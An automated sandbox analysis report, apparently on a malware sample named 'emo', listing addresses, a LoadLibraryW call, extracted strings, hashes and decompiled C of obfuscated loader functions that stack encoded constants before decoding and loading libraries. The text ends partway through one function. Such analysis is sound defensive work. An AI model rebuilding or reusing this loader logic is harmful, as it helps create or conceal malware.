0x041d7488
0x041d7492
0x041d749c
0x041d74a6
0x041d74b0
0x041d74ba
0x041d74c4
0x041d74ce
0x041d74d8
0x041d74e2
0x041d74ec
0x041d74f6
0x041d7500
0x041d750a
0x041d7514
0x041d751e
0x041d7528
0x041d7532
0x041d753c
0x041d7546
0x041d7550
0x041d755a
0x041d7564
0x041d756e
0x041d7578
0x041d7582
0x041d758c
0x041d7596
0x041d75a0
0x041d75aa
0x041d75b4
0x041d75be
0x041d75c8
0x041d75d2
0x041d75dc
0x041d75e6
0x041d75f0
0x041d75fa
0x041d7604
0x041d760e
0x041d7618
0x041d7622
0x041d762c
0x041d7636
0x041d7640
0x041d764a
0x041d7654
0x041d765e
0x041d7668
0x041d7672
0x041d767c
0x041d7686
0x041d7690
0x041d769a
0x041d76a4
0x041d76ae
0x041d76b8
0x041d76c2
0x041d76cc
0x041d76d6
0x041d76e0
0x041d76ea
0x041d76f4
0x041d76fe
0x041d7708
0x041d7712
0x041d771c
0x041d7726
0x041d7730
0x041d773a
0x041d7744
0x041d774e
0x041d7758
0x041d7762
0x041d776c
0x041d7776
0x041d7780
0x041d778a
0x041d7794
0x041d779e
0x041d77a8
0x041d77b2
0x041d77bc
0x041d77c6
0x041d77d0
0x041d77da
0x041d77e4
0x041d77ee
0x041d77f8
0x041d7802
0x041d780c
0x041d7816
0x041d7820
0x041d782a
0x041d7834
0x041d783e
0x041d7848
0x041d7852
0x041d785c
0x041d7866
0x041d7870
0x041d787a
0x041d7884
0x041d788e
0x041d7898
0x041d78a2
0x041d78ac
0x041d78b6
0x041d78c0
0x041d78ca
0x041d78d4
0x041d78de
0x041d78e8
0x041d78f2
0x041d78fc
0x041d7906
0x041d7910
0x041d791a
0x041d7924
0x041d792e
0x041d7938
0x041d7942
0x041d794c
0x041d7956
0x041d7960
0x041d796a
0x041d7974
0x041d797e
0x041d7988
0x041d7992
0x041d799c
0x041d79a6
0x041d79b0
0x041d79ba
0x041d79c4
0x041d79ce
0x041d79d8
0x041d79e2
0x041d79ec
0x041d79f6
0x041d7a00
0x041d7a0a
0x041d7a14
0x041d7a1e
0x041d7a28
0x041d7a32
0x041d7a3c
0x041d7a46
0x041d7a50
0x041d7a5a
0x041d7a64
0x041d7a6e
0x041d7a78
0x041d7a82
0x041d7a8c
0x041d7a96
0x041d7aa0
0x041d7aaa
0x041d7ab4
0x041d7abe
0x041d7ac8
0x041d7ad2
0x041d7adc
0x041d7ae6
0x041d7af0
0x041d7afa
0x041d7b04
0x041d7b0e
0x041d7b18
0x041d7b22
0x041d7b29
0x041d7b30
0x041d7b37
0x041d7b3e
0x041d7b45
0x041d7b4c
0x041d7b53
0x041d7b5a
0x041d7b61
0x041d7b68
0x041d7b6f
0x041d7b76
0x041d7b7d
0x041d7b84
0x041d7b8b
0x041d7b92
0x041d7b99
0x041d7ba0
0x041d7ba7
0x041d7bae
0x041d7bb5
0x041d7bbc
0x041d7bc3
0x041d7bca
0x041d7bd1
0x041d7bd8
0x041d7bdf
0x041d7be6
0x041d7bed
0x041d7bf4
0x041d7bfe
0x041d7c0a
0x041d7c19
0x041d7c24
0x041d7c29
0x041d7c55

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041D7C1C

Strings

JIx, xrefs: 041D756E
F2`?, xrefs: 041D7BD1
"C#}, xrefs: 041D79EC
wk#m, xrefs: 041D75D2
d;, xrefs: 041D77BC
~o>, xrefs: 041D794C
$w 4, xrefs: 041D7A64
/d4, xrefs: 041D7B04
/@n, xrefs: 041D7A28
3@[, xrefs: 041D7A32
e, xrefs: 041D7B3E
9I;\, xrefs: 041D7820
'/~, xrefs: 041D744C
tcZ], xrefs: 041D769A
LP 3, xrefs: 041D78DE

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-3739738973
Opcode ID: 7da6f2ceabb61bb9d0861c106b717790c41a879c7a1c2c4a82ec49920d649b55
Instruction ID: 714e74ec143ff1a10ca7fd1edeaed3c7a05ee328185a1d5e2c826bfe1c9c4380
Opcode Fuzzy Hash: 7da6f2ceabb61bb9d0861c106b717790c41a879c7a1c2c4a82ec49920d649b55
Instruction Fuzzy Hash: 2A12A7B48463698FDB71DF829A897CDBA74BB12744F6086C8C19D3B214CB750B86CF85

Uniqueness

Uniqueness Score: -1.00%

Function 041D929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041D929A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t250;
				void* _t260;

				_t250 = __ebx;
				 *((intOrPtr*)(_t260 - 0x3d0)) = 0x945bf994;
				 *((intOrPtr*)(_t260 - 0x3cc)) = 0xaaa7f7e9;
				 *((intOrPtr*)(_t260 - 0x3c8)) = 0x1aea51f;
				 *((intOrPtr*)(_t260 - 0x3c4)) = 0x21524dcd;
				 *((intOrPtr*)(_t260 - 0x3c0)) = 0x20c5fedd;
				 *((intOrPtr*)(_t260 - 0x3bc)) = 0xcd407cd8;
				 *((intOrPtr*)(_t260 - 0x3b8)) = 0x51189e5e;
				 *((intOrPtr*)(_t260 - 0x3b4)) = 0xb7ad4012;
				 *((intOrPtr*)(_t260 - 0x3b0)) = 0x7e6016c0;
				 *((intOrPtr*)(_t260 - 0x3ac)) = 0x27bc9d9f;
				 *((intOrPtr*)(_t260 - 0x3a8)) = 0xcce4450b;
				 *((intOrPtr*)(_t260 - 0x3a4)) = 0xffbdb221;
				 *((intOrPtr*)(_t260 - 0x3a0)) = 0x284459de;
				 *((intOrPtr*)(_t260 - 0x39c)) = 0xbde44013;
				 *((intOrPtr*)(_t260 - 0x398)) = 0x72125cca;
				 *((intOrPtr*)(_t260 - 0x394)) = 0x7f1958ca;
				 *((intOrPtr*)(_t260 - 0x390)) = 0x4ba690f8;
				 *((intOrPtr*)(_t260 - 0x38c)) = 0xee6a1f46;
				 *((intOrPtr*)(_t260 - 0x388)) = 0xae40e4ee;
				 *((intOrPtr*)(_t260 - 0x384)) = 0x83aa3c05;
				 *((intOrPtr*)(_t260 - 0x380)) = 0x52b53c99;
				 *((intOrPtr*)(_t260 - 0x37c)) = 0xb6f9c41a;
				 *((intOrPtr*)(_t260 - 0x378)) = 0xc439a85b;
				 *((intOrPtr*)(_t260 - 0x374)) = 0x5ba2c6b8;
				 *((intOrPtr*)(_t260 - 0x370)) = 0x267f5c1a;
				 *((intOrPtr*)(_t260 - 0x36c)) = 0xf09b79b9;
				 *((intOrPtr*)(_t260 - 0x368)) = 0xda8cd5b6;
				 *((intOrPtr*)(_t260 - 0x364)) = 0x7b087b1f;
				 *((intOrPtr*)(_t260 - 0x360)) = 0xae78afeb;
				 *((intOrPtr*)(_t260 - 0x35c)) = 0x171d74ec;
				 *((intOrPtr*)(_t260 - 0x358)) = 0x7e95e318;
				 *((intOrPtr*)(_t260 - 0x354)) = 0x26eeda9;
				 *((intOrPtr*)(_t260 - 0x350)) = 0x59409973;
				 *((intOrPtr*)(_t260 - 0x34c)) = 0x7dbb3cf1;
				 *((intOrPtr*)(_t260 - 0x348)) = 0x2c2223d9;
				 *((intOrPtr*)(_t260 - 0x344)) = 0x2eea5cc;
				 *((intOrPtr*)(_t260 - 0x340)) = 0xcdf02b00;
				 *((intOrPtr*)(_t260 - 0x33c)) = 0x8ab05a77;
				 *((intOrPtr*)(_t260 - 0x338)) = 0xa04217d8;
				 *((intOrPtr*)(_t260 - 0x334)) = 0xb5ada83c;
				 *((intOrPtr*)(_t260 - 0x330)) = 0x9e4dfdc2;
				 *((intOrPtr*)(_t260 - 0x32c)) = 0xd06ba0be;
				 *((intOrPtr*)(_t260 - 0x328)) = 0x79dc2075;
				 *((intOrPtr*)(_t260 - 0x324)) = 0xc0a6e5d7;
				 *((intOrPtr*)(_t260 - 0x320)) = 0x5f45e230;
				 *((intOrPtr*)(_t260 - 0x31c)) = 0x22f9a2e5;
				 *((intOrPtr*)(_t260 - 0x318)) = 0x793a9460;
				 *((intOrPtr*)(_t260 - 0x314)) = 0x3802d4da;
				 *((intOrPtr*)(_t260 - 0x310)) = 0xa6fdfe59;
				 *((intOrPtr*)(_t260 - 0x30c)) = 0x60a9f068;
				 *((intOrPtr*)(_t260 - 0x308)) = 0xddcec8e9;
				 *((intOrPtr*)(_t260 - 0x304)) = 0x8e416095;
				 *((intOrPtr*)(_t260 - 0x300)) = 0xdcb56b8d;
				 *((intOrPtr*)(_t260 - 0x2fc)) = 0xbb26e9d2;
				 *((intOrPtr*)(_t260 - 0x2f8)) = 0x5b23c3f2;
				 *((intOrPtr*)(_t260 - 0x2f4)) = 0x4cc0226a;
				 *((intOrPtr*)(_t260 - 0x2f0)) = 0x359fd24a;
				 *((intOrPtr*)(_t260 - 0x2ec)) = 0x157b3100;
				 *((intOrPtr*)(_t260 - 0x2e8)) = 0x367301a0;
				 *((intOrPtr*)(_t260 - 0x2e4)) = 0x26626ba;
				 *((intOrPtr*)(_t260 - 0x2e0)) = 0xb780e7fe;
				 *((intOrPtr*)(_t260 - 0x2dc)) = 0xa5b4d2c;
				 *((intOrPtr*)(_t260 - 0x2d8)) = 0xc12ede;
				 *((intOrPtr*)(_t260 - 0x2d4)) = 0x8ef35a2f;
				 *((intOrPtr*)(_t260 - 0x2d0)) = 0x6a370712;
				 *((intOrPtr*)(_t260 - 0x2cc)) = 0xc977b87b;
				 *((intOrPtr*)(_t260 - 0x2c8)) = 0xb76937a4;
				 *((intOrPtr*)(_t260 - 0x2c4)) = 0x188cf1ac;
				 *((intOrPtr*)(_t260 - 0x2c0)) = 0xbe2b5b9b;
				 *((intOrPtr*)(_t260 - 0x2bc)) = 0x397ae4e7;
				 *((intOrPtr*)(_t260 - 0x2b8)) = 0xd46d37d6;
				 *((intOrPtr*)(_t260 - 0x2b4)) = 0x26a23310;
				 *((intOrPtr*)(_t260 - 0x2b0)) = 0xb591ad95;
				 *((intOrPtr*)(_t260 - 0x2ac)) = 0x3c897820;
				 *((intOrPtr*)(_t260 - 0x2a8)) = 0x45be5e1a;
				 *((intOrPtr*)(_t260 - 0x2a4)) = 0xfe67b394;
				 *((intOrPtr*)(_t260 - 0x2a0)) = 0xaf103837;
				 *((intOrPtr*)(_t260 - 0x29c)) = 0x650fe6f7;
				 *((intOrPtr*)(_t260 - 0x298)) = 0xe45dbc2e;
				 *((intOrPtr*)(_t260 - 0x294)) = 0x9c73736;
				 *((intOrPtr*)(_t260 - 0x290)) = 0xc5fa8cee;
				 *((intOrPtr*)(_t260 - 0x28c)) = 0x9e548246;
				 *((intOrPtr*)(_t260 - 0x288)) = 0x68c8c4f4;
				 *((intOrPtr*)(_t260 - 0x284)) = 0xfe52e809;
				 *((intOrPtr*)(_t260 - 0x280)) = 0xdcbc18f;
				 *((intOrPtr*)(_t260 - 0x27c)) = 0xf4b9914e;
				 *((intOrPtr*)(_t260 - 0x278)) = 0x54a043eb;
				 *((intOrPtr*)(_t260 - 0x274)) = 0x30eb828d;
				 *((intOrPtr*)(_t260 - 0x270)) = 0xec4f8459;
				 *((intOrPtr*)(_t260 - 0x26c)) = 0xd8bb25e2;
				 *((intOrPtr*)(_t260 - 0x268)) = 0xff051de7;
				 *((intOrPtr*)(_t260 - 0x264)) = 0x7f20ccf1;
				 *((intOrPtr*)(_t260 - 0x260)) = 0x6984188d;
				 *((intOrPtr*)(_t260 - 0x25c)) = 0x110bdd2f;
				 *((intOrPtr*)(_t260 - 0x258)) = 0x4220bd8;
				 *((intOrPtr*)(_t260 - 0x254)) = 0xc983a25;
				 *((intOrPtr*)(_t260 - 0x250)) = 0x116557c2;
				 *((intOrPtr*)(_t260 - 0x24c)) = 0xf7e136cb;
				 *((intOrPtr*)(_t260 - 0x248)) = 0x6686d95d;
				 *((intOrPtr*)(_t260 - 0x244)) = 0x53a741f9;
				 *((intOrPtr*)(_t260 - 0x240)) = 0x58e2072a;
				 *((intOrPtr*)(_t260 - 0x23c)) = 0x153d0adb;
				 *((intOrPtr*)(_t260 - 0x238)) = 0x418628c5;
				 *((intOrPtr*)(_t260 - 0x234)) = 0xea6f143f;
				 *((intOrPtr*)(_t260 - 0x230)) = 0xe19a45af;
				 *((intOrPtr*)(_t260 - 0x22c)) = 0x674ae6e8;
				 *((intOrPtr*)(_t260 - 0x228)) = 0xe0897f97;
				 *((intOrPtr*)(_t260 - 0x224)) = 0xe1c2c5d0;
				 *((intOrPtr*)(_t260 - 0x220)) = 0xebb46c1a;
				 *((intOrPtr*)(_t260 - 0x21c)) = 0x90a2b730;
				 *((intOrPtr*)(_t260 - 0x218)) = 0x9ec9667b;
				 *((intOrPtr*)(_t260 - 0x214)) = 0x5aa4223e;
				 *((intOrPtr*)(_t260 - 0x210)) = 0x835eb7e9;
				 *((intOrPtr*)(_t260 - 0x20c)) = 0x8edd986c;
				 *((intOrPtr*)(_t260 - 0x208)) = 0x42a258a5;
				 *((intOrPtr*)(_t260 - 0x204)) = 0xdac4ed66;
				 *((intOrPtr*)(_t260 - 0x200)) = 0xe6f627a8;
				 *((intOrPtr*)(_t260 - 0x1fc)) = 0x679d5eb3;
				 *((intOrPtr*)(_t260 - 0x1f8)) = 0xccd3cb8b;
				 *((intOrPtr*)(_t260 - 0x1f4)) = 0x8c56685e;
				 *((intOrPtr*)(_t260 - 0x1f0)) = 0xd4633c28;
				 *((intOrPtr*)(_t260 - 0x1ec)) = 0x291c32e3;
				 *((intOrPtr*)(_t260 - 0x1e8)) = 0x36bec453;
				 *((intOrPtr*)(_t260 - 0x1e4)) = 0x9415975f;
				 *((intOrPtr*)(_t260 - 0x1e0)) = 0xa372918c;
				 *((intOrPtr*)(_t260 - 0x1dc)) = 0xf2457f65;
				 *((intOrPtr*)(_t260 - 0x1d8)) = 0x52dfb6ba;
				 *((intOrPtr*)(_t260 - 0x1d4)) = 0xc637c7a6;
				 *((intOrPtr*)(_t260 - 0x1d0)) = 0x172cf19d;
				 *((intOrPtr*)(_t260 - 0x1cc)) = 0xf061efd6;
				 *((intOrPtr*)(_t260 - 0x1c8)) = 0x2abd38c8;
				 *((intOrPtr*)(_t260 - 0x1c4)) = 0x609288c9;
				 *((intOrPtr*)(_t260 - 0x1c0)) = 0xa7f17d14;
				 *((intOrPtr*)(_t260 - 0x1bc)) = 0xbd0cd759;
				 *((intOrPtr*)(_t260 - 0x1b8)) = 0x714afe51;
				 *((intOrPtr*)(_t260 - 0x1b4)) = 0x5308d925;
				 *((intOrPtr*)(_t260 - 0x1b0)) = 0x5f173bf0;
				 *((intOrPtr*)(_t260 - 0x1ac)) = 0xf3fc7117;
				 *((intOrPtr*)(_t260 - 0x1a8)) = 0xce85cc57;
				 *((intOrPtr*)(_t260 - 0x1a4)) = 0x641ba30a;
				 *((intOrPtr*)(_t260 - 0x1a0)) = 0xf55fb2f;
				 *((intOrPtr*)(_t260 - 0x19c)) = 0x4e9a38e5;
				 *((intOrPtr*)(_t260 - 0x198)) = 0xb504db76;
				 *((intOrPtr*)(_t260 - 0x194)) = 0xf16dbc6e;
				 *((intOrPtr*)(_t260 - 0x190)) = 0xd95c1501;
				 *((intOrPtr*)(_t260 - 0x18c)) = 0xdd78929b;
				 *((intOrPtr*)(_t260 - 0x188)) = 0xbb79536f;
				 *((intOrPtr*)(_t260 - 0x184)) = 0x39262f3f;
				 *((intOrPtr*)(_t260 - 0x180)) = 0x6f2b0399;
				 *((intOrPtr*)(_t260 - 0x17c)) = 0xba817806;
				 *((intOrPtr*)(_t260 - 0x178)) = 0xf3618c4e;
				 *((intOrPtr*)(_t260 - 0x174)) = 0x3b999741;
				 *((intOrPtr*)(_t260 - 0x170)) = 0x411fbba3;
				 *((intOrPtr*)(_t260 - 0x16c)) = 0x1c2318a2;
				 *((intOrPtr*)(_t260 - 0x168)) = 0x7884a3a7;
				 *((intOrPtr*)(_t260 - 0x164)) = 0xa8b72b25;
				 *((intOrPtr*)(_t260 - 0x160)) = 0xae6874ce;
				 *((intOrPtr*)(_t260 - 0x15c)) = 0x3632cde1;
				 *((intOrPtr*)(_t260 - 0x158)) = 0xfa9eb6c9;
				 *((intOrPtr*)(_t260 - 0x154)) = 0x6747f054;
				 *((intOrPtr*)(_t260 - 0x150)) = 0x8250add4;
				 *((intOrPtr*)(_t260 - 0x14c)) = 0x8f1a8856;
				 *((intOrPtr*)(_t260 - 0x148)) = 0x9a5e0540;
				 *((intOrPtr*)(_t260 - 0x144)) = 0x51e211a4;
				 *((intOrPtr*)(_t260 - 0x140)) = 0x16eb9535;
				 *((intOrPtr*)(_t260 - 0x13c)) = 0x3a2b853f;
				 *((intOrPtr*)(_t260 - 0x138)) = 0x21b4b782;
				 *((intOrPtr*)(_t260 - 0x134)) = 0xc6e892d6;
				 *((intOrPtr*)(_t260 - 0x130)) = 0xf3c161e9;
				 *((intOrPtr*)(_t260 - 0x12c)) = 0x9d0cb6be;
				 *((intOrPtr*)(_t260 - 0x128)) = 0x870ceae7;
				 *((intOrPtr*)(_t260 - 0x124)) = 0x1b7c2e62;
				 *((intOrPtr*)(_t260 - 0x120)) = 0xaa639e05;
				 *((intOrPtr*)(_t260 - 0x11c)) = 0x935ba6a8;
				 *((intOrPtr*)(_t260 - 0x118)) = 0xcea5921;
				 *((intOrPtr*)(_t260 - 0x114)) = 0xa88515c4;
				 *((intOrPtr*)(_t260 - 0x110)) = 0x18b38444;
				 *((intOrPtr*)(_t260 - 0x10c)) = 0xe04bc4e1;
				 *((intOrPtr*)(_t260 - 0x108)) = 0xb7dc2599;
				 *((intOrPtr*)(_t260 - 0x104)) = 0x53709de6;
				 *((intOrPtr*)(_t260 - 0x100)) = 0xa7c6d614;
				 *((intOrPtr*)(_t260 - 0xfc)) = 0xc434e7b6;
				 *((intOrPtr*)(_t260 - 0xf8)) = 0x96795813;
				 *((intOrPtr*)(_t260 - 0xf4)) = 0x10bf5842;
				 *((intOrPtr*)(_t260 - 0xf0)) = 0xf6a128e3;
				 *((intOrPtr*)(_t260 - 0xec)) = 0xa31ba47c;
				 *((intOrPtr*)(_t260 - 0xe8)) = 0x251e1624;
				 *((intOrPtr*)(_t260 - 0xe4)) = 0x573d48da;
				 *((intOrPtr*)(_t260 - 0xe0)) = 0x5858e2eb;
				 *((intOrPtr*)(_t260 - 0xdc)) = 0xc9ad427;
				 *((intOrPtr*)(_t260 - 0xd8)) = 0xe3ee2068;
				 *((intOrPtr*)(_t260 - 0xd4)) = 0x81e5b7ed;
				 *((intOrPtr*)(_t260 - 0xd0)) = 0x7070c364;
				 *((intOrPtr*)(_t260 - 0xcc)) = 0xc2ef28cd;
				 *((intOrPtr*)(_t260 - 0xc8)) = 0x3436d178;
				 *((intOrPtr*)(_t260 - 0xc4)) = 0x239b37e0;
				 *((intOrPtr*)(_t260 - 0xc0)) = 0xf0c584aa;
				 *((intOrPtr*)(_t260 - 0xbc)) = 0xd1db28b4;
				 *((intOrPtr*)(_t260 - 0xb8)) = 0x406e6337;
				 *((intOrPtr*)(_t260 - 0xb4)) = 0x93a9c454;
				 *((intOrPtr*)(_t260 - 0xb0)) = 0x6e066d4d;
				 *((intOrPtr*)(_t260 - 0xac)) = 0xad2578bd;
				 *((intOrPtr*)(_t260 - 0xa8)) = 0xb6e9f59;
				 *((intOrPtr*)(_t260 - 0xa4)) = 0xe3cd7406;
				 *((intOrPtr*)(_t260 - 0xa0)) = 0x65a60eba;
				 *((intOrPtr*)(_t260 - 0x9c)) = 0xeca3479f;
				 *((intOrPtr*)(_t260 - 0x98)) = 0xdcd44d28;
				 *((intOrPtr*)(_t260 - 0x94)) = 0x79111240;
				 *((intOrPtr*)(_t260 - 0x90)) = 0x5cb33c63;
				 *((intOrPtr*)(_t260 - 0x8c)) = 0x56a3e771;
				 *((intOrPtr*)(_t260 - 0x88)) = 0x14c62d50;
				 *((intOrPtr*)(_t260 - 0x84)) = 0x1e4509f1;
				 *((intOrPtr*)(_t260 - 0x80)) = 0xdd090ce7;
				 *((intOrPtr*)(_t260 - 0x7c)) = 0x78fc580a;
				 *((intOrPtr*)(_t260 - 0x78)) = 0xed6f1027;
				 *((intOrPtr*)(_t260 - 0x74)) = 0x86f76681;
				 *((intOrPtr*)(_t260 - 0x70)) = 0x9bb95b77;
				 *((intOrPtr*)(_t260 - 0x6c)) = 0x9bc6e246;
				 *((intOrPtr*)(_t260 - 0x68)) = 0x791c12f;
				 *((intOrPtr*)(_t260 - 0x64)) = 0x3c59615b;
				 *((intOrPtr*)(_t260 - 0x60)) = 0xc50db427;
				 *((intOrPtr*)(_t260 - 0x5c)) = 0x6a69f14c;
				 *((intOrPtr*)(_t260 - 0x58)) = 0x6c370785;
				 *((intOrPtr*)(_t260 - 0x54)) = 0xb9b7b976;
				 *((intOrPtr*)(_t260 - 0x50)) = 0x3c036ed7;
				 *((intOrPtr*)(_t260 - 0x4c)) = 0xf8e375c9;
				 *((intOrPtr*)(_t260 - 0x48)) = 0xdf8af579;
				 *((intOrPtr*)(_t260 - 0x44)) = 0x5165af3e;
				 *((intOrPtr*)(_t260 - 0x40)) = 0x9824b845;
				 *((intOrPtr*)(_t260 - 0x3c)) = 0x6066b0;
				 *((intOrPtr*)(_t260 - 0x38)) = 0x98cb766d;
				 *((intOrPtr*)(_t260 - 0x34)) = 0x42573de5;
				 *((intOrPtr*)(_t260 - 0x30)) = 0xaae67539;
				 *((intOrPtr*)(_t260 - 0x2c)) = 0xaf00ee0f;
				 *((intOrPtr*)(_t260 - 0x28)) = 0xdd020d6a;
				 *((intOrPtr*)(_t260 - 0x24)) = 0x17fad656;
				 *((intOrPtr*)(_t260 - 0x20)) = 0x3147b59e;
				 *((intOrPtr*)(_t260 - 0x1c)) = 0xc2a59b0c;
				 *((intOrPtr*)(_t260 - 0x18)) = 0xab5c7c95;
				 *((intOrPtr*)(_t260 - 0x14)) = 0xfb3f4481;
				 *((intOrPtr*)(_t260 - 0x10)) = 0x6776ca5e;
				 *((intOrPtr*)(_t260 - 0xc)) = 0x941141e;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t260 - 8)) = 0xcde6fece;
				 *((intOrPtr*)(_t260 - 4)) = 0x35ea494f;
				_t258 = L041D1D10(0x41e3000, 0x4c, __edi, __esi);
				 *0x41e71e8 = LoadLibraryW(_t246);
				L041D1DB0(_t258);
				return E041D1570(_t250,  *0x41e71e8, _t260 - 0x3d0, _t258, 0xf4, 0x81460a0, 0x41e5b40);
			}

0x041d929a
0x041d929a
0x041d92a4
0x041d92ae
0x041d92b8
0x041d92c2
0x041d92cc
0x041d92d6
0x041d92e0
0x041d92ea
0x041d92f4
0x041d92fe
0x041d9308
0x041d9312
0x041d931c
0x041d9326
0x041d9330
0x041d933a
0x041d9344
0x041d934e
0x041d9358
0x041d9362
0x041d936c
0x041d9376
0x041d9380
0x041d938a
0x041d9394
0x041d939e
0x041d93a8
0x041d93b2
0x041d93bc
0x041d93c6
0x041d93d0
0x041d93da
0x041d93e4
0x041d93ee
0x041d93f8
0x041d9402
0x041d940c
0x041d9416
0x041d9420
0x041d942a
0x041d9434
0x041d943e
0x041d9448
0x041d9452
0x041d945c
0x041d9466
0x041d9470
0x041d947a
0x041d9484
0x041d948e
0x041d9498
0x041d94a2
0x041d94ac
0x041d94b6
0x041d94c0
0x041d94ca
0x041d94d4
0x041d94de
0x041d94e8
0x041d94f2
0x041d94fc
0x041d9506
0x041d9510
0x041d951a
0x041d9524
0x041d952e
0x041d9538
0x041d9542
0x041d954c
0x041d9556
0x041d9560
0x041d956a
0x041d9574
0x041d957e
0x041d9588
0x041d9592
0x041d959c
0x041d95a6
0x041d95b0
0x041d95ba
0x041d95c4
0x041d95ce
0x041d95d8
0x041d95e2
0x041d95ec
0x041d95f6
0x041d9600
0x041d960a
0x041d9614
0x041d961e
0x041d9628
0x041d9632
0x041d963c
0x041d9646
0x041d9650
0x041d965a
0x041d9664
0x041d966e
0x041d9678
0x041d9682
0x041d968c
0x041d9696
0x041d96a0
0x041d96aa
0x041d96b4
0x041d96be
0x041d96c8
0x041d96d2
0x041d96dc
0x041d96e6
0x041d96f0
0x041d96fa
0x041d9704
0x041d970e
0x041d9718
0x041d9722
0x041d972c
0x041d9736
0x041d9740
0x041d974a
0x041d9754
0x041d975e
0x041d9768
0x041d9772
0x041d977c
0x041d9786
0x041d9790
0x041d979a
0x041d97a4
0x041d97ae
0x041d97b8
0x041d97c2
0x041d97cc
0x041d97d6
0x041d97e0
0x041d97ea
0x041d97f4
0x041d97fe
0x041d9808
0x041d9812
0x041d981c
0x041d9826
0x041d9830
0x041d983a
0x041d9844
0x041d984e
0x041d9858
0x041d9862
0x041d986c
0x041d9876
0x041d9880
0x041d988a
0x041d9894
0x041d989e
0x041d98a8
0x041d98b2
0x041d98bc
0x041d98c6
0x041d98d0
0x041d98da
0x041d98e4
0x041d98ee
0x041d98f8
0x041d9902
0x041d990c
0x041d9916
0x041d9920
0x041d992a
0x041d9934
0x041d993e
0x041d9948
0x041d9952
0x041d995c
0x041d9966
0x041d9970
0x041d997a
0x041d9984
0x041d998e
0x041d9998
0x041d99a2
0x041d99ac
0x041d99b6
0x041d99c0
0x041d99ca
0x041d99d4
0x041d99de
0x041d99e8
0x041d99f2
0x041d99fc
0x041d9a06
0x041d9a10
0x041d9a1a
0x041d9a24
0x041d9a2e
0x041d9a38
0x041d9a42
0x041d9a4c
0x041d9a56
0x041d9a60
0x041d9a6a
0x041d9a74
0x041d9a7e
0x041d9a88
0x041d9a92
0x041d9a9c
0x041d9aa6
0x041d9ab0
0x041d9aba
0x041d9ac4
0x041d9ace
0x041d9ad8
0x041d9ae2
0x041d9ae9
0x041d9af0
0x041d9af7
0x041d9afe
0x041d9b05
0x041d9b0c
0x041d9b13
0x041d9b1a
0x041d9b21
0x041d9b28
0x041d9b2f
0x041d9b36
0x041d9b3d
0x041d9b44
0x041d9b4b
0x041d9b52
0x041d9b59
0x041d9b60
0x041d9b67
0x041d9b6e
0x041d9b75
0x041d9b7c
0x041d9b83
0x041d9b8a
0x041d9b91
0x041d9b98
0x041d9b9f
0x041d9ba6
0x041d9bad
0x041d9bb4
0x041d9bbe
0x041d9bca
0x041d9bd9
0x041d9be4
0x041d9be9
0x041d9c15

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041D9BDC

Strings

?/&9, xrefs: 041D9858
Jg, xrefs: 041D96B4
OI5, xrefs: 041D9BCA
[aY<, xrefs: 041D9B13
7cn@, xrefs: 041D9A56
z9, xrefs: 041D954C
h , xrefs: 041D9A06
0E_, xrefs: 041D9452
=WB, xrefs: 041D9B67
,M[, xrefs: 041D94FC
XX, xrefs: 041D99F2

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: f3b26ba1d05d21ed6a2f3e4482390f7f1ec9efd3e722be5d82bf2e6deb49fdaa
Instruction ID: ad754b26a57612edeaf7be2a1f7b75502747bba5821cff5b93328e3352cac6cd
Opcode Fuzzy Hash: f3b26ba1d05d21ed6a2f3e4482390f7f1ec9efd3e722be5d82bf2e6deb49fdaa
Instruction Fuzzy Hash: 2812C5B4C563A98BEB61DF829A897CDBB74BB01704F6096C8D1593B214CB750BC2CF85

Uniqueness

Uniqueness Score: -1.00%

Function 041DC4A2, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 188
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041DC4A2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t172;
				void* _t182;

				_t172 = __ebx;
				 *((intOrPtr*)(_t182 - 0x298)) = 0x52459e17;
				 *((intOrPtr*)(_t182 - 0x294)) = 0x86d386ca;
				 *((intOrPtr*)(_t182 - 0x290)) = 0x7399ebb2;
				 *((intOrPtr*)(_t182 - 0x28c)) = 0x952a5076;
				 *((intOrPtr*)(_t182 - 0x288)) = 0xcd9f87fb;
				 *((intOrPtr*)(_t182 - 0x284)) = 0x3b68407;
				 *((intOrPtr*)(_t182 - 0x280)) = 0x2b0b54ea;
				 *((intOrPtr*)(_t182 - 0x27c)) = 0x87af31fe;
				 *((intOrPtr*)(_t182 - 0x278)) = 0x32d3b2aa;
				 *((intOrPtr*)(_t182 - 0x274)) = 0xd53c4ad0;
				 *((intOrPtr*)(_t182 - 0x270)) = 0x1badd01b;
				 *((intOrPtr*)(_t182 - 0x26c)) = 0x5ca56928;
				 *((intOrPtr*)(_t182 - 0x268)) = 0x9c8e4613;
				 *((intOrPtr*)(_t182 - 0x264)) = 0xe5302044;
				 *((intOrPtr*)(_t182 - 0x260)) = 0x5940d0b6;
				 *((intOrPtr*)(_t182 - 0x25c)) = 0x297a4302;
